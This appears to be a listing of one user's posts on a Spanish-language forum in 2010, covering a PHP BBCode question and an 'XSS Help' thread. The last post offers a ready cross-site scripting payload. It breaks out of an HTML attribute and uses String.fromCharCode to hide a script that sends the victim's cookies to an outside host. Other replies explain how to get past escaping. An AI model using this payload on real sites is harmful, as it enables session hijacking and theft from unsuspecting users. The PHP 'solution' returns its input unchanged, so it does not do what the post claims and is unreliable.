|
992
|
Programación / PHP / Re: Problema con expresión regular
|
en: 12 Febrero 2010, 00:16 am
|
Ya se lo que quieres hacer, es como un BBCODE, bueno aqui lo que pediste. <?php function bbcode($text){ return $text; } echo bbcode('[b]Hola como estan[/b]'); echo bbcode('[img]http://www.grupogenova.net/Moncan/V20/imgs/upload/gato.jpg[/img]'); ?>
Salida: En este caso, el problema no necesita de expresiones regulares para resolverlo, porque no buscas parametros, si no una palabra en expecifica y remplazarla por un Tag html valido.
|
|
|
995
|
Seguridad Informática / Nivel Web / Re: XSS Help!!!
|
en: 11 Febrero 2010, 00:31 am
|
Bueno tambien, eso se llama url encoding, pero si alguna vez en cuentra otro XSS y no te funciona encodear la url por, ps te toca usar String.fromCharCode()
|
|
|
996
|
Seguridad Informática / Nivel Web / Re: XSS Help!!!
|
en: 10 Febrero 2010, 23:59 pm
|
Ok, no pasa nada, pero yo creo que se porque no podias hacerlo, ps pueda ser que el servidor tuviera On las magic quotes gpc que te escapaba las comillas dobles y simples por barras invertidas, siempre trata de ver el codigo de fuente y mira que pasa con lo que vas inyectando.
|
|
|
997
|
Seguridad Informática / Nivel Web / Re: XSS Help!!!
|
en: 10 Febrero 2010, 23:38 pm
|
Bueno este debe funcionar: "><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>
|
|
|
|
|
|
|